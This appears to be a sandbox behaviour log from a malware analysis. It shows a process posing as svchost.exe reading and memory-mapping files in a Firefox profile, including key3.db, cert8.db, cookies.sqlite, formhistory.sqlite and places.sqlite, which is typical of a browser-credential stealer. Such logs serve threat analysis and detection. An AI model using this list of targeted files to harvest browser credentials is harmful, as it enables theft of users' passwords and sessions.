| File | Get Info | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\addons.json, type = size |
|
1 | |
| Module | Create Mapping | module_name = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\addons.json, filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\addons.json, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\addons.json, process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\windows\syswow64\svchost.exe |
|
1 | |
| File | Create | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\bookmarkbackups\bookmarks-2017-06-30_5.json, desired_access = FILE_READ_ATTRIBUTES |
|
2 | |
| File | Create | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\bookmarkbackups\bookmarks-2017-06-30_5.json, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| File | Get Info | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\bookmarkbackups\bookmarks-2017-06-30_5.json, type = size |
|
1 | |
| Module | Create Mapping | module_name = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\bookmarkbackups\bookmarks-2017-06-30_5.json, filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\bookmarkbackups\bookmarks-2017-06-30_5.json, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\bookmarkbackups\bookmarks-2017-06-30_5.json, process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\windows\syswow64\svchost.exe |
|
1 | |
| File | Create | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\bookmarkbackups\bookmarks-2017-07-26_5.json, desired_access = FILE_READ_ATTRIBUTES |
|
2 | |
| File | Create | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\bookmarkbackups\bookmarks-2017-07-26_5.json, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| File | Get Info | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\bookmarkbackups\bookmarks-2017-07-26_5.json, type = size |
|
1 | |
| Module | Create Mapping | module_name = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\bookmarkbackups\bookmarks-2017-07-26_5.json, filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\bookmarkbackups\bookmarks-2017-07-26_5.json, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\bookmarkbackups\bookmarks-2017-07-26_5.json, process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\windows\syswow64\svchost.exe |
|
1 | |
| File | Create | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\cert8.db, desired_access = FILE_READ_ATTRIBUTES |
|
2 | |
| File | Create | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\cert8.db, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| File | Get Info | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\cert8.db, type = size |
|
1 | |
| Module | Create Mapping | module_name = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\cert8.db, filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\cert8.db, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\cert8.db, process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\windows\syswow64\svchost.exe |
|
1 | |
| File | Create | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\compatibility.ini, desired_access = FILE_READ_ATTRIBUTES |
|
2 | |
| File | Create | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\compatibility.ini, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| File | Get Info | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\compatibility.ini, type = size |
|
1 | |
| Module | Create Mapping | module_name = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\compatibility.ini, filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\compatibility.ini, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\compatibility.ini, process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\windows\syswow64\svchost.exe |
|
1 | |
| File | Create | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\content-prefs.sqlite, desired_access = FILE_READ_ATTRIBUTES |
|
2 | |
| File | Create | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\content-prefs.sqlite, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| File | Get Info | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\content-prefs.sqlite, type = size |
|
1 | |
| Module | Create Mapping | module_name = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\content-prefs.sqlite, filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\content-prefs.sqlite, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\content-prefs.sqlite, process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\windows\syswow64\svchost.exe |
|
1 | |
| File | Create | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\cookies.sqlite, desired_access = FILE_READ_ATTRIBUTES |
|
2 | |
| File | Create | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\cookies.sqlite, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| File | Get Info | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\cookies.sqlite, type = size |
|
1 | |
| Module | Create Mapping | module_name = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\cookies.sqlite, filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\cookies.sqlite, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\cookies.sqlite, process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\windows\syswow64\svchost.exe |
|
1 | |
| File | Create | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\downloads.sqlite, desired_access = FILE_READ_ATTRIBUTES |
|
2 | |
| File | Create | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\downloads.sqlite, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| File | Get Info | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\downloads.sqlite, type = size |
|
1 | |
| Module | Create Mapping | module_name = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\downloads.sqlite, filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\downloads.sqlite, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\downloads.sqlite, process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\windows\syswow64\svchost.exe |
|
1 | |
| File | Create | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\extensions.ini, desired_access = FILE_READ_ATTRIBUTES |
|
2 | |
| File | Create | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\extensions.ini, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| File | Get Info | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\extensions.ini, type = size |
|
1 | |
| Module | Create Mapping | module_name = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\extensions.ini, filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\extensions.ini, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\extensions.ini, process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\windows\syswow64\svchost.exe |
|
1 | |
| File | Create | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\extensions.sqlite, desired_access = FILE_READ_ATTRIBUTES |
|
2 | |
| File | Create | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\extensions.sqlite, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| File | Get Info | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\extensions.sqlite, type = size |
|
1 | |
| Module | Create Mapping | module_name = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\extensions.sqlite, filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\extensions.sqlite, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\extensions.sqlite, process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\windows\syswow64\svchost.exe |
|
1 | |
| File | Create | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\formhistory.sqlite, desired_access = FILE_READ_ATTRIBUTES |
|
2 | |
| File | Create | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\formhistory.sqlite, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| File | Get Info | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\formhistory.sqlite, type = size |
|
1 | |
| Module | Create Mapping | module_name = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\formhistory.sqlite, filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\formhistory.sqlite, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\formhistory.sqlite, process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\windows\syswow64\svchost.exe |
|
1 | |
| File | Create | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\healthreport.sqlite, desired_access = FILE_READ_ATTRIBUTES |
|
2 | |
| File | Create | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\healthreport.sqlite, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| File | Get Info | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\healthreport.sqlite, type = size |
|
1 | |
| Module | Create Mapping | module_name = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\healthreport.sqlite, filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\healthreport.sqlite, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\healthreport.sqlite, process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\windows\syswow64\svchost.exe |
|
1 | |
| File | Create | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\indexedDB\moz-safe-about+home\.metadata, desired_access = FILE_READ_ATTRIBUTES |
|
2 | |
| File | Create | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\indexedDB\moz-safe-about+home\.metadata, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| File | Get Info | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\indexedDB\moz-safe-about+home\.metadata, type = size |
|
1 | |
| Module | Create Mapping | module_name = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\indexedDB\moz-safe-about+home\.metadata, filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\indexedDB\moz-safe-about+home\.metadata, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| File | Create | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\indexedDB\moz-safe-about+home\idb\818200132aebmoouht.sqlite, desired_access = FILE_READ_ATTRIBUTES |
|
2 | |
| File | Create | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\indexedDB\moz-safe-about+home\idb\818200132aebmoouht.sqlite, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| File | Get Info | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\indexedDB\moz-safe-about+home\idb\818200132aebmoouht.sqlite, type = size |
|
1 | |
| Module | Create Mapping | module_name = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\indexedDB\moz-safe-about+home\idb\818200132aebmoouht.sqlite, filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\indexedDB\moz-safe-about+home\idb\818200132aebmoouht.sqlite, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\indexedDB\moz-safe-about+home\idb\818200132aebmoouht.sqlite, process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\windows\syswow64\svchost.exe |
|
1 | |
| File | Create | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\key3.db, desired_access = FILE_READ_ATTRIBUTES |
|
2 | |
| File | Create | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\key3.db, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| File | Get Info | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\key3.db, type = size |
|
1 | |
| Module | Create Mapping | module_name = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\key3.db, filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\key3.db, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\key3.db, process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\windows\syswow64\svchost.exe |
|
1 | |
| File | Create | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\localstore.rdf, desired_access = FILE_READ_ATTRIBUTES |
|
2 | |
| File | Create | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\localstore.rdf, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| File | Get Info | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\localstore.rdf, type = size |
|
1 | |
| Module | Create Mapping | module_name = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\localstore.rdf, filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\localstore.rdf, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\localstore.rdf, process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\windows\syswow64\svchost.exe |
|
1 | |
| File | Create | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\marionette.log, desired_access = FILE_READ_ATTRIBUTES |
|
2 | |
| File | Create | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\marionette.log, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| File | Get Info | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\marionette.log, type = size |
|
1 | |
| Module | Create Mapping | module_name = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\marionette.log, filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\marionette.log, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\marionette.log, process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\windows\syswow64\svchost.exe |
|
1 | |
| File | Create | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\mimeTypes.rdf, desired_access = FILE_READ_ATTRIBUTES |
|
2 | |
| File | Create | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\mimeTypes.rdf, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| File | Get Info | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\mimeTypes.rdf, type = size |
|
1 | |
| Module | Create Mapping | module_name = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\mimeTypes.rdf, filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\mimeTypes.rdf, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\mimeTypes.rdf, process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\windows\syswow64\svchost.exe |
|
1 | |
| File | Create | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\parent.lock, desired_access = FILE_READ_ATTRIBUTES |
|
2 | |
| File | Create | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\parent.lock, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| File | Get Info | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\parent.lock, type = size |
|
1 | |
| Module | Create Mapping | module_name = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\parent.lock, filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\parent.lock, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| File | Create | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\permissions.sqlite, desired_access = FILE_READ_ATTRIBUTES |
|
2 | |
| File | Create | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\permissions.sqlite, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| File | Get Info | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\permissions.sqlite, type = size |
|
1 | |
| Module | Create Mapping | module_name = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\permissions.sqlite, filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\permissions.sqlite, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\permissions.sqlite, process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\windows\syswow64\svchost.exe |
|
1 | |
| File | Create | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\places.sqlite, desired_access = FILE_READ_ATTRIBUTES |
|
2 | |
| File | Create | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\places.sqlite, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| File | Get Info | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\places.sqlite, type = size |
|
1 | |
| Module | Create Mapping | module_name = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\places.sqlite, filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\places.sqlite, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\places.sqlite, process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ |
|
1 | |
| File | Create | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\pluginreg.dat, desired_access = FILE_READ_ATTRIBUTES |
|
2 | |
| File | Create | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\pluginreg.dat, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| File | Get Info | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\pluginreg.dat, type = size |
|
1 | |
| Module | Create Mapping | module_name = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\pluginreg.dat, filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\pluginreg.dat, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\pluginreg.dat, process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\windows\syswow64\svchost.exe |
|
1 | |
| File | Create | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\prefs.js, desired_access = FILE_READ_ATTRIBUTES |
|
2 | |
| File | Create | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\prefs.js, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| File | Get Info | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\prefs.js, type = size |
|
1 | |
| Module | Create Mapping | module_name = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\prefs.js, filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\prefs.js, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\prefs.js, process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\windows\syswow64\svchost.exe |
|
1 | |
| File | Create | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\search.json, desired_access = FILE_READ_ATTRIBUTES |
|
2 | |
| File | Create | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\search.json, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| File | Get Info | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\search.json, type = size |
|
1 | |
| Module | Create Mapping | module_name = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\search.json, filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\search.json, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\search.json, process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\windows\syswow64\svchost.exe |
|
1 | |
| File | Create | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\secmod.db, desired_access = FILE_READ_ATTRIBUTES |
|
2 | |
| File | Create | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\secmod.db, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| File | Get Info | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\secmod.db, type = size |
|
1 | |
| Module | Create Mapping | module_name = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\secmod.db, filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\secmod.db, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\secmod.db, process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ |
|
1 | |
